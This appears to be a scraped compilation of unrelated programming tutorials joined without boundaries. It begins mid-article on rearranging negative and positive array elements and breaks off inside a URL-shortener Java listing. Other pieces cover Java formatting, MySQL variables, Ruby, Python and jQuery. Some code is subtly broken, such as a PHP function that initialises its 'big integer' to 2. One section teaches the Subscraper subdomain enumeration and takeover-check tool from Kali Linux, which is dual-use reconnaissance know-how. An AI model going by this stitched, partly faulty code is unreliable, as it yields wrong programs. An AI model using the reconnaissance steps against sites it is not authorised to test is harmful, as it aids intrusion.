        return false;

    // swap needed
    if (a < 0 && b > 0)
        return true;

    // swap not needed
    if ((a == 0 && b < 0) || (a > 0 && b == 0))
        return false;

    // swap needed
    if ((a == 0 && b > 0) || (a < 0 && b == 0))
        return true;

    // both are zero: swap not needed
    // (added so that the function returns on every path)
    return false;
}

void rearrange(int arr[], int n)
{
    sort(arr, arr + n, comp);
}

// Driver code
int main()
{
    int arr[] = { -12, 11, -13, -5, 6, -7, 5, -3, -6 };
    int n = sizeof(arr) / sizeof(arr[0]);

    rearrange(arr, n);

    for (int i = 0; i < n; i++)
        cout << " " << arr[i];

    return 0;
}

Output:

-12 -13 -5 -7 -3 -6 11 6 5

Time complexity is the same as sorting, i.e. O(n log n), since we use the standard sort function; in practice it is fast because the built-in sort uses introsort.

Approach 4: There is yet another method to solve this problem. We recursively traverse the array, cutting it into two halves (array[start..start] and array[(start + 1)..end]), and keep splitting until we reach the last element. Then we start merging back. The idea is to keep the array, at any point, in the proper sequence of negative and positive integers. The merging logic is:

(I) If array[start] is negative, merge the rest of the array as it is, so that the order of the negative numbers is maintained. Since we are tracing back from the recursive calls, we move right to left through the array, and thus naturally maintain the original sequence.

(II) If array[start] is positive, merge the rest of the array, but only after right-rotating the half array[(start + 1)..end]. The idea behind the rotation is to merge the array so that the positive array[start] is always merged with the positive elements. The only catch is that the merged array will then have all the positive elements on the left and the negative elements on the right.
So we reverse the sequence in each recursion to get back the original sequence of negative elements and then positive elements subsequently.It can be observed since we reverse the array while merging with a positive first element in each recursion, so the sequence of positive elements, although coming after the negative elements, are in reverse order. So, as a final step, we reverse only the positive half of the final array, and, subsequently getting the intended sequence.Below is the implementation of the above approach: C++ Java Python3 C# Javascript // C++ implementation of// the above approach#include <iostream> void printArray(int array[], int length){ std::cout << "["; for(int i = 0; i < length; i++) { std::cout << array[i]; if(i < (length - 1)) std::cout << ", "; else std::cout << "]" << std::endl; }} void reverse(int array[], int start, int end){ while(start < end) { int temp = array[start]; array[start] = array[end]; array[end] = temp; start++; end--; }} // Rearrange the array with all negative integers// on left and positive integers on right// use recursion to split the array with first element// as one half and the rest array as another and then// merge it with head of the array in each step void rearrange(int array[], int start, int end){ // exit condition if(start == end) return; // rearrange the array except the first // element in each recursive call rearrange(array, (start + 1), end); // If the first element of the array is positive, // then right-rotate the array by one place first // and then reverse the merged array. if(array[start] >= 0) { reverse(array, (start + 1), end); reverse(array, start, end); }} // Driver codeint main(){ int array[] = {-12, -11, -13, -5, -6, 7, 5, 3, 6}; int length = (sizeof(array) / sizeof(array[0])); int countNegative = 0; for(int i = 0; i < length; i++) { if(array[i] < 0) countNegative++; } std::cout << "array: "; printArray(array, length); rearrange(array, 0, (length - 1)); reverse(array, countNegative, (length - 1)); std::cout << "rearranged array: "; printArray(array, length); return 0;} // Java program to implement the// above approachimport java.io.*;class GFG{ static void printArray(int[] array, int length){ System.out.print("["); for (int i = 0; i < length; i++) { System.out.print(array[i]); if (i < (length - 1)) System.out.print(","); else System.out.print("]\n"); }} static void reverse(int[] array, int start, int end){ while (start < end) { int temp = array[start]; array[start] = array[end]; array[end] = temp; start++; end--; }} // Rearrange the array with// all negative integers on left// and positive integers on right// use recursion to split the// array with first element// as one half and the rest// array as another and then// merge it with head of// the array in each stepstatic void rearrange(int[] array, int start, int end){ // exit condition if (start == end) return; // rearrange the array // except the first element // in each recursive call rearrange(array, (start + 1), end); // If the first element of // the array is positive, // then right-rotate the // array by one place first // and then reverse the merged array. 
if (array[start] >= 0) { reverse(array, (start + 1), end); reverse(array, start, end); }} // Driver codepublic static void main(String[] args){ int[] array = {-12, -11, -13, -5, -6, 7, 5, 3, 6}; int length = array.length; int countNegative = 0; for (int i = 0; i < length; i++) { if (array[i] < 0) countNegative++; } System.out.print("array: "); printArray(array, length); rearrange(array, 0, (length - 1)); reverse(array, countNegative, (length - 1)); System.out.print("rearranged array: "); printArray(array, length);}} // This code is contributed by Chitranayal # Python3 implementation of the above approachdef printArray(array, length): print("[", end = "") for i in range(length): print(array[i], end = "") if(i < (length - 1)): print(",", end = " ") else: print("]") def reverse(array, start, end): while(start < end): temp = array[start] array[start] = array[end] array[end] = temp start += 1 end -= 1 # Rearrange the array with all negative integers# on left and positive integers on right# use recursion to split the array with first element# as one half and the rest array as another and then# merge it with head of the array in each stepdef rearrange(array, start, end): # exit condition if(start == end): return # rearrange the array except the first # element in each recursive call rearrange(array, (start + 1), end) # If the first element of the array is positive, # then right-rotate the array by one place first # and then reverse the merged array. if(array[start] >= 0): reverse(array, (start + 1), end) reverse(array, start, end) # Driver codeif __name__ == '__main__': array = [-12, -11, -13, -5, -6, 7, 5, 3, 6] length = len(array) countNegative = 0 for i in range(length): if(array[i] < 0): countNegative += 1 print("array: ", end = "") printArray(array, length) rearrange(array, 0, (length - 1)) reverse(array, countNegative, (length - 1)) print("rearranged array: ", end = "") printArray(array, length) # This code is contributed by mohit kumar 29 // C# implementation of// the above approachusing System;class GFG{ static void printArray(int []array, int length){ Console.Write("["); for(int i = 0; i < length; i++) { Console.Write(array[i]); if(i < (length - 1)) Console.Write(","); else Console.Write("]\n"); }} static void reverse(int []array, int start, int end){ while(start < end) { int temp = array[start]; array[start] = array[end]; array[end] = temp; start++; end--; }} // Rearrange the array with// all negative integers on left// and positive integers on right// use recursion to split the// array with first element// as one half and the rest// array as another and then// merge it with head of// the array in each step static void rearrange(int []array, int start, int end){ // exit condition if(start == end) return; // rearrange the array // except the first element // in each recursive call rearrange(array, (start + 1), end); // If the first element of // the array is positive, // then right-rotate the // array by one place first // and then reverse the merged array. 
if(array[start] >= 0) { reverse(array, (start + 1), end); reverse(array, start, end); }} // Driver codepublic static void Main(string[] args){ int []array = {-12, -11, -13, -5, -6, 7, 5, 3, 6}; int length = array.Length; int countNegative = 0; for(int i = 0; i < length; i++) { if(array[i] < 0) countNegative++; } Console.Write("array: "); printArray(array, length); rearrange(array, 0, (length - 1)); reverse(array, countNegative, (length - 1)); Console.Write("rearranged array: "); printArray(array, length);}} // This code is contributed by Rutvik_56 <script>// Javascript program to implement the// above approachfunction printArray(array, Length){ document.write("["); for (let i = 0; i < Length; i++) { document.write(array[i]); if (i < (Length - 1)) document.write(","); else document.write("]<br>"); }} function reverse(array,start,end){ while (start < end) { let temp = array[start]; array[start] = array[end]; array[end] = temp; start++; end--; }} // Rearrange the array with// all negative integers on left// and positive integers on right// use recursion to split the// array with first element// as one half and the rest// array as another and then// merge it with head of// the array in each stepfunction rearrange(array,start,end){ // exit condition if (start == end) return; // rearrange the array // except the first element // in each recursive call rearrange(array, (start + 1), end); // If the first element of // the array is positive, // then right-rotate the // array by one place first // and then reverse the merged array. if (array[start] >= 0) { reverse(array, (start + 1), end); reverse(array, start, end); }} // Driver codelet array = [-12, -11, -13, -5, -6, 7, 5, 3, 6];let length = array.length;let countNegative = 0;for (let i = 0; i < length; i++) { if (array[i] < 0) countNegative++; } document.write("array: "); printArray(array, length); rearrange(array, 0, (length - 1)); reverse(array, countNegative, (length - 1)); document.write("rearranged array: "); printArray(array, length); // This code is contributed by rag2127.</script> array: [-12, -11, -13, -5, -6, 7, 5, 3, 6] rearranged array: [-12, -11, -13, -5, -6, 7, 5, 3, 6] Time complexity: O(N^2)This article is contributed by abhijeet kaurav. If you like GeeksforGeeks and would like to contribute, you can also write an article using write.geeksforgeeks.org or mail your article to [email protected]. See your article appearing on the GeeksforGeeks main page and help other Geeks.Please write comments if you find anything incorrect, or you want to share more information about the topic discussed above. array-rearrange STL Arrays Sorting Arrays Sorting STL Writing code in comment? Please use ide.geeksforgeeks.org, generate link and share the link here. Comments Old Comments Introduction to Arrays Linked List vs Array Python | Using 2D arrays/lists the right way Queue | Set 1 (Introduction and Array Implementation) Subset Sum Problem | DP-25
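A note that is not part of the original article: std::sort does not guarantee a stable ordering, so Approach 3 above relies on the comparator alone and the relative order within each group is not formally guaranteed by the standard. A minimal alternative sketch using std::stable_partition preserves the relative order of both groups by definition (one caveat: with this predicate, zeroes remain among the non-negative elements in their original positions rather than being placed directly after the negatives):

// Alternative sketch (not from the original article):
// stable_partition keeps the relative order of negatives
// and non-negatives while moving all negatives to the front.
#include <bits/stdc++.h>
using namespace std;

int main()
{
    vector<int> arr = { 12, 11, -13, -5, 6, -7, 5, -3, -6 };

    // move all negative values to the front, preserving order
    stable_partition(arr.begin(), arr.end(),
                     [](int x) { return x < 0; });

    for (int x : arr)
        cout << x << " ";   // -13 -5 -7 -3 -6 12 11 6 5
    return 0;
}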
Formatting a Negative Number Output with Parentheses in Java
A negative number output can be shown using the Formatter object −

Formatter f = new Formatter();
f.format("%12.2f", -7.598);
System.out.println(f);

The following code formats a negative number output with parentheses, using the '(' flag −

Formatter f = new Formatter();
f.format("%(d", -50);
System.out.println(f);

The following is a complete example −

import java.util.Formatter;
public class Demo {
   public static void main(String args[]) {
      Formatter f = new Formatter();
      f.format("% d", 50);
      System.out.println(f);
      // negative number inside parentheses
      f = new Formatter();
      f.format("%(d", -50);
      System.out.println(f);
   }
}

The output is as follows −

50
(50)
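The '(' flag can also be combined with other Formatter flags. As a small additional sketch (not part of the original example), grouping separators and a floating-point conversion can be used together; based on the standard java.util.Formatter flags, this is expected to print the negative amount as (12,345.68) −

Formatter f = new Formatter();
f.format("%(,.2f", -12345.678);
System.out.println(f);   // expected: (12,345.68)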
What is the usage of “@” symbol in MySQL stored procedure?
The @ symbol in a stored procedure can be used for user-defined session variables. Let us first create a table −

mysql> create table DemoTable
   (
   StudentName varchar(50)
   );
Query OK, 0 rows affected (1.30 sec)

Insert some records in the table using the insert command −

mysql> insert into DemoTable values('John Smith');
Query OK, 1 row affected (1.00 sec)
mysql> insert into DemoTable values('John Doe');
Query OK, 1 row affected (0.19 sec)
mysql> insert into DemoTable values('Chris Brown');
Query OK, 1 row affected (0.53 sec)

Display all records from the table using the select statement −

mysql> select * from DemoTable;

This will produce the following output −

+-------------+
| StudentName |
+-------------+
| John Smith  |
| John Doe    |
| Chris Brown |
+-------------+
3 rows in set (0.00 sec)

Let us now create a stored procedure to calculate the number of records in DemoTable −

mysql> DELIMITER //
mysql> create procedure `Demo_Of_@Symbol`()
   BEGIN
   select count(*) into @numberOfRecords from DemoTable;
   END
//
Query OK, 0 rows affected (0.33 sec)
mysql> DELIMITER ;

Following is the query to call the stored procedure using the CALL command −

mysql> call `Demo_Of_@Symbol`();
Query OK, 1 row affected (0.00 sec)

Let us now see the usage of the @ symbol; the session variable set inside the procedure is still visible after the call −

mysql> select @numberOfRecords;

This will produce the following output −

+------------------+
| @numberOfRecords |
+------------------+
|                3 |
+------------------+
1 row in set (0.00 sec)
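A closely related pattern, not shown in the original example but standard MySQL, is to return the value through an OUT parameter and capture it in a session variable at call time; the procedure and variable names below are only illustrative −

mysql> DELIMITER //
mysql> create procedure CountStudents(OUT total INT)
   BEGIN
   select count(*) into total from DemoTable;
   END
//
mysql> DELIMITER ;
mysql> call CountStudents(@total);
mysql> select @total;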
Subscraper – Subdomain enumeration tool in Kali Linux
28 Jul, 2021

Subscraper is a free and open-source tool available on GitHub. It is used for reconnaissance of subdomains, i.e. for finding the subdomains of a target website or web application. It is usually difficult for a security researcher to enumerate the subdomains of an HTTPS website or web application by hand; this tool helps to get the subdomains of both HTTPS and HTTP sites. Subscraper is written in Python, so Python must be installed on your Kali Linux system in order to use it. The tool comes with a clean user interface, very similar to that of Metasploit, which makes it easy to run and use.

Subscraper is a free and open-source tool available on GitHub.
Subscraper is used for reconnaissance of subdomains of websites/web applications.
Subscraper is used for information gathering.
Subscraper is used to find subdomains of the target.

Step 1: First, install the tool using the following commands in your Kali Linux operating system, then move into the tool's directory.

git clone https://github.com/m8r0wn/subscraper
cd subscraper

Step 2: The tool has been downloaded successfully; now install it using the following command.

python3 setup.py install

The tool has been installed successfully on your system; now we will see some examples of how to use it.

Example 1: Use the subscraper tool to find the subdomains of a website.

subscraper <domain>

Once the scanning is completed, use the following command to perform a subdomain takeover check.

subscraper --takeover subscraper_report.txt

Now, to view the report, use the following commands.

ls
nano subscraper_report.txt

This is the subdomain takeover report of the tool. You can see that we have found the subdomains of the domain geeksforgeeks.org; similarly, you can find the subdomains of any domain. This tool helps security researchers in the initial phases of reconnaissance and security scanning of websites and web applications.

Example 2: Use the subscraper tool to find the subdomains of a website while changing the enumeration level of the scan.

subscraper -e 3 <domain>
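Not part of the original article: once a list of candidate subdomains has been collected (for example from subscraper_report.txt), a quick way to check which of them actually resolve is a few lines of standard-library Python. The report is assumed here to contain one hostname per line; that format is an assumption about how you might post-process it, not something the tool documents −

import socket

# hypothetical post-processing of the report file produced above
with open("subscraper_report.txt") as f:
    subdomains = [line.strip() for line in f if line.strip()]

for sub in subdomains:
    try:
        ip = socket.gethostbyname(sub)
        print(f"{sub} resolves to {ip}")
    except socket.gaierror:
        print(f"{sub} does not resolve")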
Ruby | String reverse Method
08 Jan, 2020

reverse is a String class method in Ruby which is used to return a new string with the characters from the given string in reverse order.

Syntax: str.reverse

Parameters: Here, str is the string which is to be reversed.

Returns: This method returns a new string in reversed order.

Example 1:

# Ruby program to demonstrate
# the reverse method

# Taking a string and
# using the method
puts "GeeksforGeeks".reverse
puts "Ruby".reverse

Output:

skeeGrofskeeG
ybuR

Example 2:

# Ruby program to demonstrate
# the reverse method

# Taking a string and
# using the method
puts "String".reverse
puts "Class".reverse

Output:

gnirtS
ssalC
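Ruby also provides reverse!, which reverses the string in place instead of returning a new copy. A small additional example, not taken from the original article:

# reverse! modifies the receiver itself
str = "GeeksforGeeks"
str.reverse!
puts str    # => skeeGrofskeeG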
Generate all permutation of a set in Python
21 Jan, 2022

A permutation is an arrangement of objects in a specific order, and the order of arrangement is what matters. The number of permutations of a set of n elements is given by n!. For example, there are 2! = 2*1 = 2 permutations of {1, 2}, namely {1, 2} and {2, 1}, and 3! = 3*2*1 = 6 permutations of {1, 2, 3}, namely {1, 2, 3}, {1, 3, 2}, {2, 1, 3}, {2, 3, 1}, {3, 1, 2} and {3, 2, 1}.

Method 1 (Backtracking): We can use the backtracking based recursive solution discussed here.

Method 2: The idea is to extract each element one by one, place it at the first position and recur for the remaining list.

# Python function to print permutations of a given list
def permutation(lst):

    # If lst is empty then there are no permutations
    if len(lst) == 0:
        return []

    # If there is only one element in lst then, only
    # one permutation is possible
    if len(lst) == 1:
        return [lst]

    # Find the permutations for lst if there are
    # more than 1 characters

    l = []  # empty list that will store current permutation

    # Iterate the input(lst) and calculate the permutation
    for i in range(len(lst)):
        m = lst[i]

        # Extract lst[i] or m from the list. remLst is
        # remaining list
        remLst = lst[:i] + lst[i+1:]

        # Generating all permutations where m is first
        # element
        for p in permutation(remLst):
            l.append([m] + p)
    return l


# Driver program to test above function
data = list('123')
for p in permutation(data):
    print(p)

Output:

['1', '2', '3']
['1', '3', '2']
['2', '1', '3']
['2', '3', '1']
['3', '1', '2']
['3', '2', '1']

Method 3 (Direct Function): We can simply use the built-in permutations function from the itertools library. It is the shortest way to obtain the permutations.

from itertools import permutations
l = list(permutations(range(1, 4)))
print(l)

Output:

[(1, 2, 3), (1, 3, 2), (2, 1, 3), (2, 3, 1), (3, 1, 2), (3, 2, 1)]

This article is contributed by Arpit Agarwal. If you like GeeksforGeeks and would like to contribute, you can also write an article and mail your article to [email protected]. See your article appearing on the GeeksforGeeks main page and help other Geeks. Please write comments if you find anything incorrect, or you want to share more information about the topic discussed above.
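A small addition not covered in the original article: itertools.permutations also accepts an optional length argument r, which generates the permutations of only r elements at a time −

from itertools import permutations

# all 2-element permutations of {1, 2, 3}
print(list(permutations(range(1, 4), 2)))
# [(1, 2), (1, 3), (2, 1), (2, 3), (3, 1), (3, 2)]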
Minimum difference between max and min of all K-size subsets
08 Jul, 2022

Given an array of integer values, we need to find the minimum difference between the maximum and the minimum of all possible K-length subsets.

Examples:

Input  : arr[] = [3, 5, 100, 101, 102]
         K = 3
Output : 2

Explanation : Possible subsets of K-length with
their differences are,
[3 5 100]     max min diff is (100 - 3)   = 97
[3 5 101]     max min diff is (101 - 3)   = 98
[3 5 102]     max min diff is (102 - 3)   = 99
[3 100 101]   max min diff is (101 - 3)   = 98
[3 100 102]   max min diff is (102 - 3)   = 99
[3 101 102]   max min diff is (102 - 3)   = 99
[5 100 101]   max min diff is (101 - 5)   = 96
[5 100 102]   max min diff is (102 - 5)   = 97
[5 101 102]   max min diff is (102 - 5)   = 97
[100 101 102] max min diff is (102 - 100) = 2
As the minimum difference is 2, it should
be the answer for the given array.

Input  : arr[] = {5, 1, 10, 6}
         K = 2
Output : 1
We get the above result considering subset {5, 6}

We can solve this problem without iterating over all possible subsets by observing that the subset giving the answer is always consecutive once we sort the given array. The reason is that sorting brings value-wise close elements together.

We can prove the above fact as follows – suppose we chose numbers a1, a2, a3 ... aK which are in increasing order but not consecutive in the sorted array. The difference is (aK – a1), but if we instead include a number that was skipped (say aR), our K-length subset becomes a2, a3, ... aR, ... aK. In this case the difference is (aK – a2), which must be smaller than (aK – a1) because a2 > a1. So the subset that contains our answer is always consecutive in the sorted array.

Starting from the above fact, to solve the problem we first sort the array, then iterate over the first (N – K + 1) starting positions; each time we take the difference between the two elements that are (K – 1) positions apart, and the final answer is the minimum of these differences.

Implementation:

C++

// C++ program to find minimum difference
// between max and min of all subset of K size
#include <bits/stdc++.h>

using namespace std;

// returns min difference between max
// and min of any K-size subset
int minDifferenceAmongMaxMin(int arr[], int N, int K)
{
    // sort the array so that close
    // elements come together.
    sort(arr, arr + N);

    // initialize result by a big integer number
    int res = INT_MAX;

    // loop over first (N - K) elements
    // of the array only
    for (int i = 0; i <= (N - K); i++)
    {
        // get difference between max and
        // min of current K-sized segment
        int curSeqDiff = arr[i + K - 1] - arr[i];
        res = min(res, curSeqDiff);
    }

    return res;
}

// Driver code
int main()
{
    int arr[] = {10, 20, 30, 100, 101, 102};
    int N = sizeof(arr) / sizeof(arr[0]);
    int K = 3;

    cout << minDifferenceAmongMaxMin(arr, N, K);
    return 0;
}

Java

// Java program to find minimum difference
// between max and min of all subset of
// K size
import java.util.Arrays;

class GFG
{
    // returns min difference between max
    // and min of any K-size subset
    static int minDifferenceAmongMaxMin(int arr[], int N, int K)
    {
        // sort the array so that close
        // elements come together.
Arrays.sort(arr); // initialize result by // a big integer number int res = 2147483647; // loop over first (N - K) elements // of the array only for (int i = 0; i <= (N - K); i++) { // get difference between max and // min of current K-sized segment int curSeqDiff = arr[i + K - 1] - arr[i]; res = Math.min(res, curSeqDiff); } return res; } // Driver code public static void main(String[] args) { int arr[] = {10, 20, 30, 100, 101, 102}; int N = arr.length; int K = 3; System.out.print( minDifferenceAmongMaxMin(arr, N, K)); }} // This code is contributed by Anant Agarwal. # Python3 program to find minimum# difference between max and min# of all subset of K size # Returns min difference between max# and min of any K-size subsetdef minDifferenceAmongMaxMin(arr, N, K): # sort the array so that close # elements come together. arr.sort() # initialize result by a # big integer number res = 2147483647 # loop over first (N - K) elements # of the array only for i in range((N - K) + 1): # get difference between max and min # of current K-sized segment curSeqDiff = arr[i + K - 1] - arr[i] res = min(res, curSeqDiff) return res # Driver Codearr = [10, 20, 30, 100, 101, 102]N = len(arr)K = 3print(minDifferenceAmongMaxMin(arr, N, K)) # This code is contributed by Anant Agarwal. // C# program to find minimum difference// between max and min of all subset of// K sizeusing System; class GFG{ // returns min difference between max // and min of any K-size subset static int minDifferenceAmongMaxMin(int []arr, int N, int K) { // sort the array so that close // elements come together. Array.Sort(arr); // initialize result by // a big integer number int res = 2147483647; // loop over first (N - K) elements // of the array only for (int i = 0; i <= (N - K); i++) { // get difference between max and // min of current K-sized segment int curSeqDiff = arr[i + K - 1] - arr[i]; res = Math.Min(res, curSeqDiff); } return res; } // Driver code public static void Main() { int []arr= {10, 20, 30, 100, 101, 102}; int N = arr.Length; int K = 3; Console.Write( minDifferenceAmongMaxMin(arr, N, K)); }} // This code is contributed by nitin mittal <?php// PHP program to find minimum difference// between max and min of all subset// of K size // returns min difference between max// and min of any K-size subsetfunction minDifferenceAmongMaxMin($arr, $N, $K){ $INT_MAX = 2; // sort the array so that close // elements come together. sort($arr); sort($arr , $N); // initialize result by a // big integer number $res = $INT_MAX; // loop over first (N - K) elements // of the array only for ($i = 0; $i <= ($N - $K); $i++) { // get difference between max and // min of current K-sized segment $curSeqDiff = $arr[$i + $K - 1] - $arr[$i]; $res = min($res, $curSeqDiff); } return $res;} // Driver Code $arr = array(10, 20, 30, 100, 101, 102); $N = sizeof($arr); $K = 3; echo minDifferenceAmongMaxMin($arr, $N, $K); // This code is contributed by Nitin Mittal.?> <script> // JavaScript program to find minimum difference// between max and min of all subset of// K size // returns min difference between max // and min of any K-size subset function minDifferenceAmongMaxMin(arr, N, K) { // sort the array so that close // elements come together. 
arr.sort((a, b) => a - b); // initialize result by // a big integer number let res = 2147483647; // loop over first (N - K) elements // of the array only for (let i = 0; i <= (N - K); i++) { // get difference between max and // min of current K-sized segment let curSeqDiff = arr[i + K - 1] - arr[i]; res = Math.min(res, curSeqDiff); } return res; } // Driver Code let arr = [10, 20, 30, 100, 101, 102]; let N = arr.length; let K = 3; document.write( minDifferenceAmongMaxMin(arr, N, K)); </script> 2 Time Complexity: O(n Log n) This article is contributed by Utkarsh Trivedi. If you like GeeksforGeeks and would like to contribute, you can also write an article using write.geeksforgeeks.org or mail your article to [email protected]. See your article appearing on the GeeksforGeeks main page and help other Geeks. nitin mittal sanjoy_62 rajeev0719singh simranarora5sos hardikkoriintern subset Arrays Sorting Arrays Sorting subset Writing code in comment? Please use ide.geeksforgeeks.org, generate link and share the link here.
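As a quick sanity check, the second example from the problem statement can be verified with the Python3 function above (the call below is just an illustration, not part of the original article):

# arr = [5, 1, 10, 6], k = 2  ->  sorted [1, 5, 6, 10]
# windows of size 2: (1,5)=4, (5,6)=1, (6,10)=4  ->  minimum is 1
print(minDifferenceAmongMaxMin([5, 1, 10, 6], 4, 2))   # prints 1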
Python – Convert List of Dictionaries to List of Lists
14 May, 2020

Sometimes, while working with Python data, we can have a problem in which we need to convert a list of dictionaries into a list of lists. This can be simplified by appending the keys just once if they are repetitive, as they usually are in records, which saves memory space. This type of problem can have applications in the web development domain. Let's discuss certain ways in which this task can be performed.

Input : test_list = [{'Gfg': 123, 'best': 10}, {'Gfg': 51, 'best': 7}]
Output : [['Gfg', 'best'], [123, 10], [51, 7]]

Input : test_list = [{'Gfg' : 12}]
Output : [['Gfg'], [12]]

Method #1 : Using loop + enumerate()

In this approach we iterate with a simple loop and use enumerate() to know when we are at the first dictionary, so that its keys are appended once before the values.

# Python3 code to demonstrate working of
# Convert List of Dictionaries to List of Lists
# Using loop + enumerate()

# initializing list
test_list = [{'Nikhil' : 17, 'Akash' : 18, 'Akshat' : 20},
             {'Nikhil' : 21, 'Akash' : 30, 'Akshat' : 10},
             {'Nikhil' : 31, 'Akash' : 12, 'Akshat' : 19}]

# printing original list
print("The original list is : " + str(test_list))

# Convert List of Dictionaries to List of Lists
# Using loop + enumerate()
res = []
for idx, sub in enumerate(test_list, start = 0):
    if idx == 0:
        res.append(list(sub.keys()))
        res.append(list(sub.values()))
    else:
        res.append(list(sub.values()))

# printing result
print("The converted list : " + str(res))

Output:
The original list is : [{'Akash': 18, 'Nikhil': 17, 'Akshat': 20}, {'Akash': 30, 'Nikhil': 21, 'Akshat': 10}, {'Akash': 12, 'Nikhil': 31, 'Akshat': 19}]
The converted list : [['Akash', 'Nikhil', 'Akshat'], [18, 17, 20], [30, 21, 10], [12, 31, 19]]

Method #2 : Using list comprehension

This task can be solved in one line using list comprehension. In this, we extract the keys using keys() and the values using values().

# Python3 code to demonstrate working of
# Convert List of Dictionaries to List of Lists
# Using list comprehension

# initializing list
test_list = [{'Nikhil' : 17, 'Akash' : 18, 'Akshat' : 20},
             {'Nikhil' : 21, 'Akash' : 30, 'Akshat' : 10},
             {'Nikhil' : 31, 'Akash' : 12, 'Akshat' : 19}]

# printing original list
print("The original list is : " + str(test_list))

# Convert List of Dictionaries to List of Lists
# Using list comprehension
res = [[key for key in test_list[0].keys()],
       *[list(idx.values()) for idx in test_list]]

# printing result
print("The converted list : " + str(res))

Output:
The original list is : [{'Akash': 18, 'Nikhil': 17, 'Akshat': 20}, {'Akash': 30, 'Nikhil': 21, 'Akshat': 10}, {'Akash': 12, 'Nikhil': 31, 'Akshat': 19}]
The converted list : [['Akash', 'Nikhil', 'Akshat'], [18, 17, 20], [30, 21, 10], [12, 31, 19]]
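Both methods above assume that every dictionary in the list has the same keys in the same order. If that ordering is not guaranteed, a small variant (a sketch only, reusing the same test_list) can look each value up by the keys of the first dictionary, so the columns always line up with the header row:

# Sketch: build each row by key lookup, so column order always
# matches the header row even if the dicts were built differently
keys = list(test_list[0].keys())
res = [keys] + [[d[k] for k in keys] for d in test_list]
print(res)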
jQuery | get() Method
01 Mar, 2019

In jQuery, the .get() method loads data from the server by using an HTTP GET request. This method returns the jqXHR (XMLHttpRequest) object.

Syntax

$.get( url, [data], [callback], [type] )

Parameters

url : String containing the URL at which the request is to be sent.
data : This is an optional parameter that represents key/value pairs that will be sent to the server.
callback : This optional parameter represents the function which is to be executed whenever the data is loaded successfully.
type : This parameter represents the type of data to be returned to the callback function, i.e. "xml", "script", "json", "html", "jsonp", or "text".

Example:

This PHP code is used to return data when the HTML program below sends the HTTP GET request.

<?php
// Result.php file
if( $_REQUEST["name"] ) {
    $name = $_REQUEST['name'];
    echo "Welcome " . $name;
}
?>

This HTML code is used to send the HTTP GET request.

<html>
<head>
    <script type="text/javascript"
        src="https://ajax.googleapis.com/ajax/libs/jquery/2.1.3/jquery.min.js">
    </script>

    <script type="text/javascript" language="javascript">
        $(document).ready(function() {
            $("#driver").click(function(event) {
                $.get(
                    "result.php",
                    { name: "GFG" },
                    function(data) {
                        $('#stage').html(data);
                    });
            });
        });
    </script>
</head>

<body>
    <p>Click on the button to load result file</p>

    <span id="stage" style="background-color:#cc0;">
        GeeksForGeeks
    </span>

    <div>
        <input type="button" id="driver" value="Load Data" />
    </div>
</body>
</html>

Output: Before clicking the button, the span shows "GeeksForGeeks"; after clicking it, the server response "Welcome GFG" is loaded into the span.
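The callback passed to $.get() runs only on success. If the request can fail (for example, result.php is missing), the returned jqXHR object also exposes Promise-style handlers; a minimal sketch against the same result.php endpoint used above:

// Success and error handling with the jqXHR object returned by $.get()
$.get("result.php", { name: "GFG" })
    .done(function(data) {
        $('#stage').html(data);                        // runs when the request succeeds
    })
    .fail(function(jqXHR, textStatus) {
        $('#stage').html("Request failed: " + textStatus);   // runs on error
    });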
How to design a tiny URL or URL shortener?
27 Jun, 2022

How to design a system that takes big URLs like "https://www.geeksforgeeks.org/count-sum-of-digits-in-numbers-from-1-to-n/" and converts them into a short 6-character URL. It is given that URLs are stored in a database and every URL has an associated integer id.

One important thing to note is that the long URL should also be uniquely identifiable from the short URL, so we need a bijective function.

One Simple Solution could be Hashing. Use a hash function to convert the long string to a short string. With hashing, there may be collisions (2 long URLs map to the same short URL), and we need a unique short URL for every long URL so that we can get the long URL back.

A Better Solution is to use the integer id stored in the database and convert the integer to a character string that is at most 6 characters long. This problem can basically be seen as a base conversion problem where we have a 10-digit input number and we want to convert it into a 6-character long string.

Below is one important observation about possible characters in a URL. A URL character can be one of the following:

A lower case alphabet ['a' to 'z'], total 26 characters
An upper case alphabet ['A' to 'Z'], total 26 characters
A digit ['0' to '9'], total 10 characters

There are in total 26 + 26 + 10 = 62 possible characters. So the task is to convert a decimal number to a base 62 number. To get the original long URL, we need to get the URL id in the database. The id can be obtained using base 62 to decimal conversion.

Implementation (C++, Java, Python3, C#, Javascript):

// C++ program to generate short url from integer id and
// integer id back from short url.
#include <iostream>
#include <algorithm>
#include <string>
using namespace std;

// Function to generate a short url from integer ID
string idToShortURL(long int n)
{
    // Map to store 62 possible characters
    char map[] = "abcdefghijklmnopqrstuvwxyzABCDEF"
                 "GHIJKLMNOPQRSTUVWXYZ0123456789";

    string shorturl;

    // Convert given integer id to a base 62 number
    while (n)
    {
        // use above map to store actual character
        // in short url
        shorturl.push_back(map[n % 62]);
        n = n / 62;
    }

    // Reverse shortURL to complete base conversion
    reverse(shorturl.begin(), shorturl.end());

    return shorturl;
}

// Function to get integer ID back from a short url
long int shortURLtoID(string shortURL)
{
    long int id = 0; // initialize result

    // A simple base conversion logic
    for (int i = 0; i < shortURL.length(); i++)
    {
        if ('a' <= shortURL[i] && shortURL[i] <= 'z')
            id = id * 62 + shortURL[i] - 'a';
        if ('A' <= shortURL[i] && shortURL[i] <= 'Z')
            id = id * 62 + shortURL[i] - 'A' + 26;
        if ('0' <= shortURL[i] && shortURL[i] <= '9')
            id = id * 62 + shortURL[i] - '0' + 52;
    }
    return id;
}

// Driver program to test above function
int main()
{
    int n = 12345;
    string shorturl = idToShortURL(n);
    cout << "Generated short url is " << shorturl << endl;
    cout << "Id from url is " << shortURLtoID(shorturl);
    return 0;
}

// Java program to generate short url from integer id and
// integer id back from short url.
import java.util.*;
import java.lang.*;
import java.io.*;

class GFG {

    // Function to generate a short url from integer ID
    static String idToShortURL(int n)
    {
        // Map to store 62 possible characters
        char map[] = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789".toCharArray();

        StringBuffer shorturl = new StringBuffer();

        // Convert given integer id to a base 62 number
        while (n > 0)
        {
            // use above map to store actual character
            // in short url
            shorturl.append(map[n % 62]);
            n = n / 62;
        }

        // Reverse shortURL to complete base conversion
        return shorturl.reverse().toString();
    }

    // Function to get integer ID back from a short url
    static int shortURLtoID(String shortURL)
    {
        int id = 0; // initialize result

        // A simple base conversion logic
        for (int i = 0; i < shortURL.length(); i++)
        {
            if ('a' <= shortURL.charAt(i) && shortURL.charAt(i) <= 'z')
                id = id * 62 + shortURL.charAt(i) - 'a';
